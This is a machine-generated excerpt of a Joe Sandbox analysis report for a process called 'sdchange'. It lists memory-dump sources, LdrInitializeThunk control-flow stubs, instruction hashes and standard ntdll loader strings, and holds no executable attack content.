                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4d673b6be3b72be2202cd81eafe195d4aa0646bdb34afc3ac68d24b4453d5a4c
                                                                                  • Instruction ID: 732777d894413b9c5ce6ccddc24b4d629f126fef4fa9ac26ae7ca91f0c2d902b
                                                                                  • Opcode Fuzzy Hash: 4d673b6be3b72be2202cd81eafe195d4aa0646bdb34afc3ac68d24b4453d5a4c
                                                                                  • Instruction Fuzzy Hash: B090022621284042F60475685D14B07000587D0347F51E569A0245554CC925E8616521

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 138 43c29f0-43c29fc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 969ee8c35963ed482102bb2d57f3a21c2308cc424451872c981dd1ac252a474e
                                                                                  • Instruction ID: 9954773f8cc6dc190058a551006c99868715a4d357790b8d5661fbd6d509b28f
                                                                                  • Opcode Fuzzy Hash: 969ee8c35963ed482102bb2d57f3a21c2308cc424451872c981dd1ac252a474e
                                                                                  • Instruction Fuzzy Hash: 9B90022A212040032509B5581704507004687D5395351E475F1106550CD631E8616121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 139 43c2a10-43c2a1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f560ad8707998cc2bb0a73b5e8f344e79c818839e9cddc7ace7a4f8dd70c2776
                                                                                  • Instruction ID: 6e7fbbb6b754069d334174e1289466075cc537fd04db7bbef164aea00d0d0e92
                                                                                  • Opcode Fuzzy Hash: f560ad8707998cc2bb0a73b5e8f344e79c818839e9cddc7ace7a4f8dd70c2776
                                                                                  • Instruction Fuzzy Hash: 6790022A222040022549B558170450B044597D6395391E469F1507590CC631E8656321

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 43c2a80-43c2a8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4e8dc1f22c9fc0dda9737231c3c94330003bffdf1e740def76e6906966246aaa
                                                                                  • Instruction ID: 1afee289aa4265fa0d5e12b3258e215be96369df0db0311fd5b40198c8aa1235
                                                                                  • Opcode Fuzzy Hash: 4e8dc1f22c9fc0dda9737231c3c94330003bffdf1e740def76e6906966246aaa
                                                                                  • Instruction Fuzzy Hash: E690026620304003650971585514616400A87E0245B51E475E1105590DC535E8917125

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 141 43c2ac0-43c2acc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e9b5dc2d4f7af026fc4e07d2b8f080d4a1c2d16b32a03e53d9de8bbb1a09d936
                                                                                  • Instruction ID: 13ca561f08c2f9bbccfcd6654e1b1daf38b6c84dceb0e6dc2abff6d06f8f117c
                                                                                  • Opcode Fuzzy Hash: e9b5dc2d4f7af026fc4e07d2b8f080d4a1c2d16b32a03e53d9de8bbb1a09d936
                                                                                  • Instruction Fuzzy Hash: 3B90023660604802F55471585514746000587D0345F51E465A0115654DC765EA5576A1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 143 43c2b10-43c2b1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b6ce108ad84cc86a88d6a6d4d0a65e3cfc2fabbe5674c2f9d44ea8547161b74e
                                                                                  • Instruction ID: 6be02d2cf560debd5c15ef8363605c49091aa844d6a1587caf5e4aac39ce5d8f
                                                                                  • Opcode Fuzzy Hash: b6ce108ad84cc86a88d6a6d4d0a65e3cfc2fabbe5674c2f9d44ea8547161b74e
                                                                                  • Instruction Fuzzy Hash: F690023620204802F5847158550464A000587D1345F91E469A0116654DCA25EA5977A1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 142 43c2b00-43c2b0c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e71cc3df66f300a68086fc359c75c65adae39c6a67139e712c0fb6dedd6ff0fe
                                                                                  • Instruction ID: 5f23b7927e25b48b7ce54225ad146561590dae28dc2c90ad58fbedfea75300de
                                                                                  • Opcode Fuzzy Hash: e71cc3df66f300a68086fc359c75c65adae39c6a67139e712c0fb6dedd6ff0fe
                                                                                  • Instruction Fuzzy Hash: 8D90023620608842F54471585504A46001587D0349F51E465A0155694DD635ED55B661

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 43c2b90-43c2b9c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: dfba41694cd32594b67307b9bd9e42801dcaed23a4b4ad59236fa14b79400147
                                                                                  • Instruction ID: 0bbd2689b0fb8a5539482001f3498a14c02f12a91eed6d7035cf2f6b99410912
                                                                                  • Opcode Fuzzy Hash: dfba41694cd32594b67307b9bd9e42801dcaed23a4b4ad59236fa14b79400147
                                                                                  • Instruction Fuzzy Hash: C79002362020C802F5147158950474A000587D0345F55E865A4515658DC6A5E8917121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 144 43c2b80-43c2b8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 79bf230a1bbce62416a75f769e79ca3a3660cd526604c3f801334ca7a0f0df1d
                                                                                  • Instruction ID: 77d80501cc30748161b2a6760dca6674af61a09059a18072155c51757cf5ef13
                                                                                  • Opcode Fuzzy Hash: 79bf230a1bbce62416a75f769e79ca3a3660cd526604c3f801334ca7a0f0df1d
                                                                                  • Instruction Fuzzy Hash: 1590023620204842F50471585504B46000587E0345F51E46AA0215654DC625E8517521

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 146 43c2bc0-43c2bcc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7084d4be876654c8130a2f95d5584f15911e6219ede0863a976e44be7a233be8
                                                                                  • Instruction ID: 39dc8ccde7f6e17dcc72a8bee0bd6657fe56251f3455d777b06d466ea8550e19
                                                                                  • Opcode Fuzzy Hash: 7084d4be876654c8130a2f95d5584f15911e6219ede0863a976e44be7a233be8
                                                                                  • Instruction Fuzzy Hash: 7090023620204402F50475986508646000587E0345F51F465A5115555EC675E8917131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6bd02b58681b4ea1f17eeac6257f95ee14fdd485fdbc6556a07688c0d5344136
                                                                                  • Instruction ID: 8344c151fd10402671bc6d244686b2a2f18205011f0fee2bf16321dbe97d657a
                                                                                  • Opcode Fuzzy Hash: 6bd02b58681b4ea1f17eeac6257f95ee14fdd485fdbc6556a07688c0d5344136
                                                                                  • Instruction Fuzzy Hash: 9790023660614402F50471585614706100587D0245F61E865A0515568DC7A5E95175A2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 134 43c2b2a-43c2b2f 135 43c2b3f-43c2b46 LdrInitializeThunk 134->135 136 43c2b31-43c2b38 134->136
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6d12508631c18bbc0edd5cbb3c57806625b1781b18d3a2dd7c5c0c503ce9460c
                                                                                  • Instruction ID: b3be6bfdfca2fb5b827c42dd7beed34cf043eef33576ebed0d5c0ece54d8a79a
                                                                                  • Opcode Fuzzy Hash: 6d12508631c18bbc0edd5cbb3c57806625b1781b18d3a2dd7c5c0c503ce9460c
                                                                                  • Instruction Fuzzy Hash: 26B09272D024C5CAFB15EB605B08B1B7A00ABD0745F26E4AAE2560681E8B78E491F276
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36983201764.00000000021B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_21b0000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e794ab65510640298d30b824be680a5b3d2981dcdc6d8d325b88d8248fce4306
                                                                                  • Instruction ID: 0d91212cb75b7c8ef5cbb792363edae5688587c1a888647ff39a715545cb93a4
                                                                                  • Opcode Fuzzy Hash: e794ab65510640298d30b824be680a5b3d2981dcdc6d8d325b88d8248fce4306
                                                                                  • Instruction Fuzzy Hash: 97C0801107095097D304553DD4636D9B7309B43231354D75BC4A1049D1CD1550634695
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 043F4460
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043F4507
                                                                                  • Execute=1, xrefs: 043F451E
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 043F454D
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 043F4592
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 043F4530
                                                                                  • ExecuteOptions, xrefs: 043F44AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 6882208fe25cb83c10cbbfef9ace8f28e2db9ea044a45a95fc68ec7262f81a9f
                                                                                  • Instruction ID: e11b57f75ed34d36454b13e14223969b02959c55e547ca206dd9b60812d977e0
                                                                                  • Opcode Fuzzy Hash: 6882208fe25cb83c10cbbfef9ace8f28e2db9ea044a45a95fc68ec7262f81a9f
                                                                                  • Instruction Fuzzy Hash: 1D511B31A002197AFF10AEA4DC95FEA736CEF54304F1454AAD745A7580EB70BE458F94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@$@w1wX
                                                                                  • API String ID: 0-3909879739
                                                                                  • Opcode ID: aa83bab3e11d612256258c62188dfe7ea9a4d148a4858ad21427c1b85f4d7ef7
                                                                                  • Instruction ID: cfc5f17fc3cf332ae303e0dcc5eba99a7f7f9990301a8817e901e2a2d1031843
                                                                                  • Opcode Fuzzy Hash: aa83bab3e11d612256258c62188dfe7ea9a4d148a4858ad21427c1b85f4d7ef7
                                                                                  • Instruction Fuzzy Hash: CD813BB1D012699BDB31DF54CC44BEEB6B8AF08714F1051DAA909B7290E730AE858FA1